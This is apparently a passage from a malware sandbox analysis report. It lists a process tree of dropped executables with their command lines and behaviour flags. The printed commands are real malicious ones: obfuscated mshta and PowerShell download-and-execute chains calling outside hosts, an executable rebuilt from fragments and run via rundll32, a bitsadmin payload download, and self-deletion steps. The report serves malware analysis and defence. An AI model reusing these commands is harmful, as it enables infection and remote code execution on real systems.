  Command line: "C:\Windows\System32\cmd.exe" /Q /C COpy /Y "C:\Users\Admin\AppData\Local\Temp\sfx_123_206.exe" ..\4MCYlgNAW.eXE && StArT ..\4MCYlGNAW.EXE /pni3MGzH3fZ3zm0HbFMiEo11u& IF "" =="" for %z iN ("C:\Users\Admin\AppData\Local\Temp\sfx_123_206.exe") do taskkill -f /Im "%~nXz"
- C:\Users\Admin\AppData\Local\Temp\4MCYlgNAW.eXE (depth 10)
  Command line: ..\4MCYlGNAW.EXE /pni3MGzH3fZ3zm0HbFMiEo11u
  - Executes dropped EXE
- C:\Windows\SysWOW64\mshta.exe (depth 11)
  Command line: "C:\Windows\System32\mshta.exe" vbScriPt: CLOSe ( CreatEOBjECt ("WScRIpt.sHell" ). rUn ( "CmD.Exe /Q /C COpy /Y ""C:\Users\Admin\AppData\Local\Temp\4MCYlgNAW.eXE"" ..\4MCYlgNAW.eXE && StArT ..\4MCYlGNAW.EXE /pni3MGzH3fZ3zm0HbFMiEo11u& IF ""/pni3MGzH3fZ3zm0HbFMiEo11u"" =="""" for %z iN (""C:\Users\Admin\AppData\Local\Temp\4MCYlgNAW.eXE"") do taskkill -f /Im ""%~nXz"" " , 0 , tRue ))
- C:\Windows\SysWOW64\cmd.exe (depth 12)
  Command line: "C:\Windows\System32\cmd.exe" /Q /C COpy /Y "C:\Users\Admin\AppData\Local\Temp\4MCYlgNAW.eXE" ..\4MCYlgNAW.eXE && StArT ..\4MCYlGNAW.EXE /pni3MGzH3fZ3zm0HbFMiEo11u& IF "/pni3MGzH3fZ3zm0HbFMiEo11u" =="" for %z iN ("C:\Users\Admin\AppData\Local\Temp\4MCYlgNAW.eXE") do taskkill -f /Im "%~nXz"
- C:\Windows\SysWOW64\mshta.exe (depth 11)
  Command line: "C:\Windows\System32\mshta.exe" vbscript: cLoSE ( cREAtEObJect ( "wSCRipT.SHELl" ). Run("Cmd /Q /C eCHo | SeT /p = ""MZ"" > 4~T6.Kj6& cOPy /b /y 4~T6.kJ6 +JJDPQL_.2B+ Z8ISJ6._Nm+oAykH.~~ +kdDPiLEn.~T5 + MZaNA.E ..\Kz_AMsXL.6g & Del /q *& STArT control ..\kZ_AmsXL.6G " ,0, trUE ) )
  - Executes dropped EXE
- C:\Windows\SysWOW64\cmd.exe (depth 12)
  Command line: "C:\Windows\System32\cmd.exe" /Q /C eCHo | SeT /p = "MZ" > 4~T6.Kj6&cOPy /b /y 4~T6.kJ6+JJDPQL_.2B+Z8ISJ6._Nm+oAykH.~~ +kdDPiLEn.~T5 + MZaNA.E ..\Kz_AMsXL.6g & Del /q *& STArT control ..\kZ_AmsXL.6G
- C:\Windows\SysWOW64\cmd.exe (depth 13)
  Command line: C:\Windows\system32\cmd.exe /S /D /c" SeT /p = "MZ" 1>4~T6.Kj6"
- C:\Windows\SysWOW64\cmd.exe (depth 13)
  Command line: C:\Windows\system32\cmd.exe /S /D /c" eCHo "
- C:\Windows\SysWOW64\control.exe (depth 13)
  Command line: control ..\kZ_AmsXL.6G
- C:\Windows\SysWOW64\rundll32.exe (depth 14)
  Command line: "C:\Windows\system32\rundll32.exe" Shell32.dll,Control_RunDLL ..\kZ_AmsXL.6G
- C:\Windows\system32\RunDll32.exe (depth 15)
  Command line: C:\Windows\system32\RunDll32.exe Shell32.dll,Control_RunDLL ..\kZ_AmsXL.6G
- C:\Windows\SysWOW64\rundll32.exe (depth 16)
  Command line: "C:\Windows\SysWOW64\rundll32.exe" "C:\Windows\SysWOW64\shell32.dll",#44 ..\kZ_AmsXL.6G
  - Loads dropped DLL
- C:\Windows\SysWOW64\taskkill.exe (depth 10)
  Command line: taskkill -f /Im "sfx_123_206.exe"
  - Kills process with taskkill
- C:\Users\Admin\AppData\Local\Temp\setup_2.exe (depth 7)
  Command line: "C:\Users\Admin\AppData\Local\Temp\setup_2.exe"
- C:\Users\Admin\AppData\Local\Temp\is-V60SK.tmp\setup_2.tmp (depth 8)
  Command line: "C:\Users\Admin\AppData\Local\Temp\is-V60SK.tmp\setup_2.tmp" /SL5="$102CC,140785,56832,C:\Users\Admin\AppData\Local\Temp\setup_2.exe"
  - Executes dropped EXE
  - Loads dropped DLL
- C:\Users\Admin\AppData\Local\Temp\setup_2.exe (depth 9)
  Command line: "C:\Users\Admin\AppData\Local\Temp\setup_2.exe" /SILENT
- C:\Users\Admin\AppData\Local\Temp\is-8U88J.tmp\setup_2.tmp (depth 10)
  Command line: "C:\Users\Admin\AppData\Local\Temp\is-8U88J.tmp\setup_2.tmp" /SL5="$202CC,140785,56832,C:\Users\Admin\AppData\Local\Temp\setup_2.exe" /SILENT
  - Executes dropped EXE
  - Loads dropped DLL
  - Drops file in Program Files directory
  - Suspicious use of FindShellTrayWindow
- C:\Users\Admin\AppData\Local\Temp\is-RNPTR.tmp\postback.exe (depth 11)
  Command line: "C:\Users\Admin\AppData\Local\Temp\is-RNPTR.tmp\postback.exe" ss1
  - Executes dropped EXE
  - Suspicious use of SetThreadContext
- C:\Windows\SysWOW64\explorer.exe (depth 12)
  Command line: explorer.exe ss1
- C:\Windows\SysWOW64\cmd.exe (depth 13)
  Command line: cmd.exe /c start /B powershell -windowstyle hidden -command "&{$t='#i#ex##@(n#ew#########-#ob#jec######t N#et#.W#####eb#Cl#ie#nt#).###Up#loa#dSt#######ri#####ng(#''h#t#tp#:###//shellloader.top/#w#el#co####me''#,###''S#e#ve#n#J#o###k##er''###)##|#ie##x'.replace('#','').split('@',5);&$t[0]$t[1]}"
- C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe (depth 14)
  Command line: powershell -windowstyle hidden -command "&{$t='#i#ex##@(n#ew#########-#ob#jec######t N#et#.W#####eb#Cl#ie#nt#).###Up#loa#dSt#######ri#####ng(#''h#t#tp#:###//shellloader.top/#w#el#co####me''#,###''S#e#ve#n#J#o###k##er''###)##|#ie##x'.replace('#','').split('@',5);&$t[0]$t[1]}"
  - Blocklisted process makes network request
- C:\Users\Admin\AppData\Local\Temp\RV8MiD2jx.exe (depth 13)
  Command line: "C:\Users\Admin\AppData\Local\Temp\RV8MiD2jx.exe"
- C:\Windows\SYSTEM32\cmd.exe (depth 14)
  Command line: cmd /c "helimlim.bat"
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe (depth 15)
  Command line: powershell -w h -enc IAAkAGEAPQBpAHcAcgAgACcAaAB0AHQAcAA6AC8ALwA0ADUALgA2ADEALgAxADMANwAuADEANwAyAC8AeQByAGQALgBwAHMAMQAnACAALQBVAHMAZQBCAGEAcwBpAGMAUABBAHIAcwBpAG4AZwAgAHwAaQBlAHgA
  - Blocklisted process makes network request
- C:\Windows\system32\wscript.exe (depth 16)
  Command line: "C:\Windows\system32\wscript.exe" C:\Users\Admin\AppData\Local\Temp\start.vbs
- C:\Users\Admin\AppData\Local\Temp\jhuuee.exe (depth 7)
  Command line: "C:\Users\Admin\AppData\Local\Temp\jhuuee.exe"
  - Executes dropped EXE
- C:\Users\Admin\AppData\Local\Temp\pli-game.exe (depth 7)
  Command line: "C:\Users\Admin\AppData\Local\Temp\pli-game.exe"
  - Executes dropped EXE
- C:\Users\Admin\AppData\Local\Temp\BearVpn 3.exe (depth 7)
  Command line: "C:\Users\Admin\AppData\Local\Temp\BearVpn 3.exe"
- C:\Windows\SysWOW64\cmd.exe (depth 4)
  Command line: C:\Windows\system32\cmd.exe /c Wed15cdfe4f1ee8.exe
- C:\Users\Admin\AppData\Local\Temp\7zSC54B9F92\Wed15cdfe4f1ee8.exe (depth 5)
  Command line: Wed15cdfe4f1ee8.exe
  - Executes dropped EXE
- C:\Windows\SysWOW64\mshta.exe (depth 6)
  Command line: "C:\Windows\System32\mshta.exe" vbSCRiPt: cloSe(cReATEOBJecT ("WScRIPt.SHelL" ).RUn ("C:\Windows\system32\cmd.exe /c copY /Y ""C:\Users\Admin\AppData\Local\Temp\7zSC54B9F92\Wed15cdfe4f1ee8.exe"" SkVPVS3t6Y8W.EXe && STart SkVPVs3t6Y8W.exE /phmOv~geMVZhd~P51OGqJQYYUK & iF """" == """" for %U In ( ""C:\Users\Admin\AppData\Local\Temp\7zSC54B9F92\Wed15cdfe4f1ee8.exe"" ) do taskkill -F -Im ""%~nXU"" ", 0, trUE) )
- C:\Windows\SysWOW64\cmd.exe (depth 7)
  Command line: "C:\Windows\system32\cmd.exe" /c copY /Y "C:\Users\Admin\AppData\Local\Temp\7zSC54B9F92\Wed15cdfe4f1ee8.exe" SkVPVS3t6Y8W.EXe &&STart SkVPVs3t6Y8W.exE /phmOv~geMVZhd~P51OGqJQYYUK & iF ""== "" for %U In ( "C:\Users\Admin\AppData\Local\Temp\7zSC54B9F92\Wed15cdfe4f1ee8.exe" ) do taskkill -F -Im "%~nXU"
- C:\Users\Admin\AppData\Local\Temp\SkVPVS3t6Y8W.EXe (depth 8)
  Command line: SkVPVs3t6Y8W.exE /phmOv~geMVZhd~P51OGqJQYYUK
  - Executes dropped EXE
- C:\Windows\SysWOW64\mshta.exe (depth 9)
  Command line: "C:\Windows\System32\mshta.exe" vbSCRiPt: cloSe(cReATEOBJecT ("WScRIPt.SHelL" ).RUn ("C:\Windows\system32\cmd.exe /c copY /Y ""C:\Users\Admin\AppData\Local\Temp\SkVPVS3t6Y8W.EXe"" SkVPVS3t6Y8W.EXe && STart SkVPVs3t6Y8W.exE /phmOv~geMVZhd~P51OGqJQYYUK & iF ""/phmOv~geMVZhd~P51OGqJQYYUK "" == """" for %U In ( ""C:\Users\Admin\AppData\Local\Temp\SkVPVS3t6Y8W.EXe"" ) do taskkill -F -Im ""%~nXU"" ", 0, trUE) )
- C:\Windows\SysWOW64\cmd.exe (depth 10)
  Command line: "C:\Windows\system32\cmd.exe" /c copY /Y "C:\Users\Admin\AppData\Local\Temp\SkVPVS3t6Y8W.EXe" SkVPVS3t6Y8W.EXe &&STart SkVPVs3t6Y8W.exE /phmOv~geMVZhd~P51OGqJQYYUK & iF "/phmOv~geMVZhd~P51OGqJQYYUK "== "" for %U In ( "C:\Users\Admin\AppData\Local\Temp\SkVPVS3t6Y8W.EXe" ) do taskkill -F -Im "%~nXU"
- C:\Windows\SysWOW64\mshta.exe (depth 9)
  Command line: "C:\Windows\System32\mshta.exe" vBsCRipT:CloSE ( CReaTEoBJEct ( "WSCRIPT.SHElL" ). rUn("cMd /q /C eCHo | SET /P = ""MZ"" > yW7bB.DeE &COpy /Y /b YW7bB.DEe + YLRXm6O.QZ + 3UII17.UI + EZZS.MDf + Uts09Z.AiZ + JNYESn.Co FUEJ5.QM & StARt control .\FUEj5.QM " , 0 , tRuE ) )
- C:\Windows\SysWOW64\cmd.exe (depth 10)
  Command line: "C:\Windows\System32\cmd.exe" /q /C eCHo | SET /P = "MZ" > yW7bB.DeE &COpy /Y /b YW7bB.DEe + YLRXm6O.QZ+ 3UII17.UI + EZZS.MDf + Uts09Z.AiZ + JNYESn.Co FUEJ5.QM& StARt control .\FUEj5.QM
- C:\Windows\SysWOW64\cmd.exe (depth 11)
  Command line: C:\Windows\system32\cmd.exe /S /D /c" eCHo "
- C:\Windows\SysWOW64\cmd.exe (depth 11)
  Command line: C:\Windows\system32\cmd.exe /S /D /c" SET /P = "MZ" 1>yW7bB.DeE"
- C:\Windows\SysWOW64\control.exe (depth 11)
  Command line: control .\FUEj5.QM
- C:\Windows\SysWOW64\rundll32.exe (depth 12)
  Command line: "C:\Windows\system32\rundll32.exe" Shell32.dll,Control_RunDLL .\FUEj5.QM
- C:\Windows\system32\RunDll32.exe (depth 13)
  Command line: C:\Windows\system32\RunDll32.exe Shell32.dll,Control_RunDLL .\FUEj5.QM
- C:\Windows\SysWOW64\rundll32.exe (depth 14)
  Command line: "C:\Windows\SysWOW64\rundll32.exe" "C:\Windows\SysWOW64\shell32.dll",#44 .\FUEj5.QM
- C:\Windows\SysWOW64\taskkill.exe (depth 8)
  Command line: taskkill -F -Im "Wed15cdfe4f1ee8.exe"
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
- C:\Windows\SysWOW64\cmd.exe (depth 4)
  Command line: C:\Windows\system32\cmd.exe /c Wed150b6a68b74a9.exe
  - Suspicious use of WriteProcessMemory
- C:\Users\Admin\AppData\Local\Temp\7zSC54B9F92\Wed150b6a68b74a9.exe (depth 5)
  Command line: Wed150b6a68b74a9.exe
  - Executes dropped EXE
- C:\Windows\SysWOW64\cmd.exe (depth 4)
  Command line: C:\Windows\system32\cmd.exe /c Wed15bfd6504f7748c.exe /mixone
- C:\Users\Admin\AppData\Local\Temp\7zSC54B9F92\Wed15bfd6504f7748c.exe (depth 5)
  Command line: Wed15bfd6504f7748c.exe /mixone
  - Executes dropped EXE
- C:\Windows\SysWOW64\WerFault.exe (depth 6)
  Command line: C:\Windows\SysWOW64\WerFault.exe -u -p 4284 -s 660
  - Program crash
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
- C:\Windows\SysWOW64\WerFault.exe (depth 6)
  Command line: C:\Windows\SysWOW64\WerFault.exe -u -p 4284 -s 676
  - Program crash
- C:\Windows\SysWOW64\WerFault.exe (depth 6)
  Command line: C:\Windows\SysWOW64\WerFault.exe -u -p 4284 -s 684
  - Program crash
- C:\Windows\SysWOW64\WerFault.exe (depth 6)
  Command line: C:\Windows\SysWOW64\WerFault.exe -u -p 4284 -s 656
  - Program crash
- C:\Windows\SysWOW64\WerFault.exe (depth 6)
  Command line: C:\Windows\SysWOW64\WerFault.exe -u -p 4284 -s 884
  - Program crash
- C:\Windows\SysWOW64\WerFault.exe (depth 6)
  Command line: C:\Windows\SysWOW64\WerFault.exe -u -p 4284 -s 932
  - Program crash
- C:\Windows\SysWOW64\WerFault.exe (depth 6)
  Command line: C:\Windows\SysWOW64\WerFault.exe -u -p 4284 -s 1196
  - Program crash
- C:\Windows\SysWOW64\WerFault.exe (depth 6)
  Command line: C:\Windows\SysWOW64\WerFault.exe -u -p 4284 -s 1168
  - Program crash
- C:\Windows\SysWOW64\WerFault.exe (depth 6)
  Command line: C:\Windows\SysWOW64\WerFault.exe -u -p 4284 -s 1156
  - Program crash
- C:\Windows\SysWOW64\cmd.exe (depth 6)
  Command line: "C:\Windows\System32\cmd.exe" /c taskkill /im "Wed15bfd6504f7748c.exe" /f & erase "C:\Users\Admin\AppData\Local\Temp\7zSC54B9F92\Wed15bfd6504f7748c.exe" & exit
- C:\Windows\SysWOW64\taskkill.exe (depth 7)
  Command line: taskkill /im "Wed15bfd6504f7748c.exe" /f
  - Kills process with taskkill
- C:\Windows\SysWOW64\cmd.exe (depth 4)
  Command line: C:\Windows\system32\cmd.exe /c Wed15c2e7469a14dca.exe
- C:\Users\Admin\AppData\Local\Temp\7zSC54B9F92\Wed15c2e7469a14dca.exe (depth 5)
  Command line: Wed15c2e7469a14dca.exe
  - Executes dropped EXE
  - Loads dropped DLL
  - Checks processor information in registry
- C:\Windows\SysWOW64\cmd.exe (depth 6)
  Command line: "C:\Windows\System32\cmd.exe" /c taskkill /im Wed15c2e7469a14dca.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\AppData\Local\Temp\7zSC54B9F92\Wed15c2e7469a14dca.exe" & del C:\ProgramData\*.dll & exit
- C:\Windows\SysWOW64\taskkill.exe (depth 7)
  Command line: taskkill /im Wed15c2e7469a14dca.exe /f
  - Kills process with taskkill
- C:\Windows\SysWOW64\timeout.exe (depth 7)
  Command line: timeout /t 6
  - Delays execution with timeout.exe
- C:\Windows\SysWOW64\cmd.exe (depth 4)
  Command line: C:\Windows\system32\cmd.exe /c Wed15566afaea59e.exe
- C:\Users\Admin\AppData\Local\Temp\7zSC54B9F92\Wed15566afaea59e.exe (depth 5)
  Command line: Wed15566afaea59e.exe
  - Executes dropped EXE
  - Checks BIOS information in registry
  - Checks whether UAC is enabled
  - Suspicious use of NtSetInformationThreadHideFromDebugger
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
- C:\Windows\SysWOW64\cmd.exe (depth 4)
  Command line: C:\Windows\system32\cmd.exe /c Wed15edb855a49.exe
- C:\Windows\SysWOW64\cmd.exe (depth 4)
  Command line: C:\Windows\system32\cmd.exe /c Wed15fbd6ef41b4f.exe
- C:\Windows\SysWOW64\cmd.exe (depth 4)
  Command line: C:\Windows\system32\cmd.exe /c Wed15e2f113a40ce5.exe
- C:\Windows\SysWOW64\cmd.exe (depth 4)
  Command line: C:\Windows\system32\cmd.exe /c Wed1556d5b7e9b2c8.exe
- C:\Windows\SysWOW64\cmd.exe (depth 4)
  Command line: C:\Windows\system32\cmd.exe /c Wed15ac1df9305ded09.exe
  - Suspicious use of WriteProcessMemory
- C:\Windows\SysWOW64\cmd.exe (depth 4)
  Command line: C:\Windows\system32\cmd.exe /c Wed1529d8198a8f0c1.exe
  - Suspicious use of WriteProcessMemory
- C:\Users\Admin\AppData\Local\Temp\7zSC54B9F92\Wed15edb855a49.exe (depth 1)
  Command line: Wed15edb855a49.exe
  - Executes dropped EXE
  - Checks SCSI registry key(s)
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious behavior: MapViewOfSection
- C:\Users\Admin\AppData\Local\Temp\7zSC54B9F92\Wed1556d5b7e9b2c8.exe (depth 1)
  Command line: Wed1556d5b7e9b2c8.exe
- C:\Users\Admin\AppData\Local\Temp\7zSC54B9F92\Wed15fbd6ef41b4f.exe (depth 1)
  Command line: Wed15fbd6ef41b4f.exe
  - Executes dropped EXE
- C:\Users\Admin\AppData\Local\Temp\is-332AK.tmp\Wed15fbd6ef41b4f.tmp (depth 2)
  Command line: "C:\Users\Admin\AppData\Local\Temp\is-332AK.tmp\Wed15fbd6ef41b4f.tmp" /SL5="$A005C,239846,156160,C:\Users\Admin\AppData\Local\Temp\7zSC54B9F92\Wed15fbd6ef41b4f.exe"
  - Executes dropped EXE
  - Loads dropped DLL
- C:\Users\Admin\AppData\Local\Temp\is-1HR2N.tmp\Sayma.exe (depth 3)
  Command line: "C:\Users\Admin\AppData\Local\Temp\is-1HR2N.tmp\Sayma.exe" /S /UID=burnerch2
  - Drops file in Drivers directory
  - Executes dropped EXE
  - Adds Run key to start application
- C:\Program Files\7-Zip\VNMHQZBEJA\ultramediaburner.exe (depth 4)
  Command line: "C:\Program Files\7-Zip\VNMHQZBEJA\ultramediaburner.exe" /VERYSILENT
  - Executes dropped EXE
- C:\Users\Admin\AppData\Local\Temp\is-IA6EL.tmp\ultramediaburner.tmp (depth 5)
  Command line: "C:\Users\Admin\AppData\Local\Temp\is-IA6EL.tmp\ultramediaburner.tmp" /SL5="$203A6,281924,62464,C:\Program Files\7-Zip\VNMHQZBEJA\ultramediaburner.exe" /VERYSILENT
  - Executes dropped EXE
  - Suspicious use of FindShellTrayWindow
- C:\Program Files (x86)\UltraMediaBurner\UltraMediaBurner.exe (depth 6)
  Command line: "C:\Program Files (x86)\UltraMediaBurner\UltraMediaBurner.exe" -silent -desktopShortcut -programMenu
  - Executes dropped EXE
- C:\Users\Admin\AppData\Local\Temp\1d-527a4-753-1969f-01b1722c667d7\Gixesemegy.exe (depth 4)
  Command line: "C:\Users\Admin\AppData\Local\Temp\1d-527a4-753-1969f-01b1722c667d7\Gixesemegy.exe"
  - Executes dropped EXE
  - Checks computer location settings
- C:\Users\Admin\AppData\Local\Temp\8d-99b71-284-306ad-77cf712bf3165\Lyshopadiqi.exe (depth 4)
  Command line: "C:\Users\Admin\AppData\Local\Temp\8d-99b71-284-306ad-77cf712bf3165\Lyshopadiqi.exe"
  - Executes dropped EXE
- C:\Windows\System32\cmd.exe (depth 5)
  Command line: "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\51fczwbi.55y\GcleanerEU.exe /eufive & exit
- C:\Users\Admin\AppData\Local\Temp\51fczwbi.55y\GcleanerEU.exe (depth 6)
  Command line: C:\Users\Admin\AppData\Local\Temp\51fczwbi.55y\GcleanerEU.exe /eufive
- C:\Windows\SysWOW64\WerFault.exe (depth 7)
  Command line: C:\Windows\SysWOW64\WerFault.exe -u -p 6304 -s 648
  - Program crash
- C:\Windows\SysWOW64\WerFault.exe (depth 7)
  Command line: C:\Windows\SysWOW64\WerFault.exe -u -p 6304 -s 632
  - Program crash
- C:\Windows\SysWOW64\WerFault.exe (depth 7)
  Command line: C:\Windows\SysWOW64\WerFault.exe -u -p 6304 -s 764
  - Program crash
- C:\Windows\SysWOW64\WerFault.exe (depth 7)
  Command line: C:\Windows\SysWOW64\WerFault.exe -u -p 6304 -s 800
  - Program crash
- C:\Windows\SysWOW64\WerFault.exe (depth 7)
  Command line: C:\Windows\SysWOW64\WerFault.exe -u -p 6304 -s 888
  - Program crash
- C:\Windows\SysWOW64\cmd.exe (depth 7)
  Command line: "C:\Windows\System32\cmd.exe" /c taskkill /im "GcleanerEU.exe" /f & erase "C:\Users\Admin\AppData\Local\Temp\51fczwbi.55y\GcleanerEU.exe" & exit
- C:\Windows\SysWOW64\taskkill.exe (depth 8)
  Command line: taskkill /im "GcleanerEU.exe" /f
  - Kills process with taskkill
- C:\Windows\System32\cmd.exe (depth 5)
  Command line: "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\wxfmhdip.scd\installer.exe /qn CAMPAIGN="654" & exit
- C:\Users\Admin\AppData\Local\Temp\wxfmhdip.scd\installer.exe (depth 6)
  Command line: C:\Users\Admin\AppData\Local\Temp\wxfmhdip.scd\installer.exe /qn CAMPAIGN="654"
  - Executes dropped EXE
  - Loads dropped DLL
  - Enumerates connected drives
  - Modifies system certificate store
  - Suspicious use of FindShellTrayWindow
- C:\Windows\SysWOW64\msiexec.exe (depth 7)
  Command line: "C:\Windows\system32\msiexec.exe" /i "C:\Users\Admin\AppData\Roaming\AW Manager\Windows Manager 1.0.0\install\97FDF62\Windows Manager - Postback Y.msi" /qn CAMPAIGN=654 AI_SETUPEXEPATH=C:\Users\Admin\AppData\Local\Temp\wxfmhdip.scd\installer.exe SETUPEXEDIR=C:\Users\Admin\AppData\Local\Temp\wxfmhdip.scd\ EXE_CMD_LINE="/exenoupdates /forcecleanup /wintime 1632951009 /qn CAMPAIGN=""654"" " CAMPAIGN="654"
- C:\Windows\System32\cmd.exe (depth 5)
  Command line: "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\amclwgfr.d1f\any.exe & exit
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
- C:\Users\Admin\AppData\Local\Temp\amclwgfr.d1f\any.exe (depth 6)
  Command line: C:\Users\Admin\AppData\Local\Temp\amclwgfr.d1f\any.exe
- C:\Windows\System32\cmd.exe (depth 5)
  Command line: "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\j3rk1m1n.lfa\gcleaner.exe /mixfive & exit
- C:\Users\Admin\AppData\Local\Temp\j3rk1m1n.lfa\gcleaner.exe (depth 6)
  Command line: C:\Users\Admin\AppData\Local\Temp\j3rk1m1n.lfa\gcleaner.exe /mixfive
  - Executes dropped EXE
- C:\Windows\SysWOW64\WerFault.exe (depth 7)
  Command line: C:\Windows\SysWOW64\WerFault.exe -u -p 7768 -s 648
  - Program crash
- C:\Windows\SysWOW64\WerFault.exe (depth 7)
  Command line: C:\Windows\SysWOW64\WerFault.exe -u -p 7768 -s 660
  - Program crash
- C:\Windows\SysWOW64\WerFault.exe (depth 7)
  Command line: C:\Windows\SysWOW64\WerFault.exe -u -p 7768 -s 668
  - Program crash
- C:\Windows\SysWOW64\WerFault.exe (depth 7)
  Command line: C:\Windows\SysWOW64\WerFault.exe -u -p 7768 -s 672
  - Program crash
- C:\Windows\SysWOW64\WerFault.exe (depth 7)
  Command line: C:\Windows\SysWOW64\WerFault.exe -u -p 7768 -s 884
  - Program crash
- C:\Windows\SysWOW64\WerFault.exe (depth 7)
  Command line: C:\Windows\SysWOW64\WerFault.exe -u -p 7768 -s 944
  - Program crash
- C:\Windows\SysWOW64\WerFault.exe (depth 7)
  Command line: C:\Windows\SysWOW64\WerFault.exe -u -p 7768 -s 1168
  - Program crash
- C:\Windows\SysWOW64\WerFault.exe (depth 7)
  Command line: C:\Windows\SysWOW64\WerFault.exe -u -p 7768 -s 1180
  - Program crash
- C:\Windows\SysWOW64\cmd.exe (depth 7)
  Command line: "C:\Windows\System32\cmd.exe" /c taskkill /im "gcleaner.exe" /f & erase "C:\Users\Admin\AppData\Local\Temp\j3rk1m1n.lfa\gcleaner.exe" & exit
- C:\Windows\SysWOW64\taskkill.exe (depth 8)
  Command line: taskkill /im "gcleaner.exe" /f
  - Kills process with taskkill
- C:\Windows\System32\cmd.exe (depth 5)
  Command line: "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\15jcl5uq.hvr\autosubplayer.exe /S & exit
- C:\Users\Admin\AppData\Local\Temp\15jcl5uq.hvr\autosubplayer.exe (depth 6)
  Command line: C:\Users\Admin\AppData\Local\Temp\15jcl5uq.hvr\autosubplayer.exe /S
  - Executes dropped EXE
  - Loads dropped DLL
  - Drops file in Program Files directory
- C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe (depth 7)
  Command line: powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nspEAFF.tmp\tempfile.ps1"
- C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe (depth 7)
  Command line: powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nspEAFF.tmp\tempfile.ps1"
- C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe (depth 7)
  Command line: powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nspEAFF.tmp\tempfile.ps1"
- C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe (depth 7)
  Command line: powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nspEAFF.tmp\tempfile.ps1"
- C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe (depth 7)
  Command line: powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nspEAFF.tmp\tempfile.ps1"
- C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe (depth 7)
  Command line: powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nspEAFF.tmp\tempfile.ps1"
- C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe (depth 7)
  Command line: powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nspEAFF.tmp\tempfile.ps1"
- C:\Windows\SysWOW64\bitsadmin.exe (depth 7)
  Command line: "bitsadmin" /Transfer helper http://lighteningstoragecenter.com/data/data.7z C:\zip.7z
  - Download via BitsAdmin
- C:\Windows\System32\Conhost.exe (depth 8)
  Command line: \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
- C:\Program Files (x86)\lighteningplayer\data_load.exe (depth 7)
  Command line: "C:\Program Files (x86)\lighteningplayer\data_load.exe" -piKZNpnxj7ps2Vba -y x C:\zip.7z -o"C:\Program Files\temp_files\"
  - Drops file in Program Files directory
- C:\Program Files (x86)\lighteningplayer\data_load.exe (depth 7)
  Command line: "C:\Program Files (x86)\lighteningplayer\data_load.exe" -pZy3DKDGFkSCqK3x -y x C:\zip.7z -o"C:\Program Files\temp_files\"
- C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe (depth 7)
  Command line: powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nspEAFF.tmp\tempfile.ps1"
- C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe (depth 7)
  Command line: powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nspEAFF.tmp\tempfile.ps1"
- C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe (depth 7)
  Command line: powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nspEAFF.tmp\tempfile.ps1"
- C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe (depth 7)
  Command line: powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nspEAFF.tmp\tempfile.ps1"
- C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe (depth 7)
  Command line: powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nspEAFF.tmp\tempfile.ps1"
- C:\Windows\SysWOW64\rundll32.exe (depth 7)
  Command line: C:\Windows\System32\rundll32.exe "C:\Program Files (x86)\OnpGSK\OnpGSK.dll" OnpGSK
- C:\Windows\system32\rundll32.exe (depth 8)
  Command line: C:\Windows\System32\rundll32.exe "C:\Program Files (x86)\OnpGSK\OnpGSK.dll" OnpGSK
  - Drops file in System32 directory
- C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe (depth 7)
  Command line: powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nspEAFF.tmp\tempfile.ps1"
- C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe (depth 7)
  Command line: powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nspEAFF.tmp\tempfile.ps1"
- C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe (depth 7)
  Command line: powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nspEAFF.tmp\tempfile.ps1"
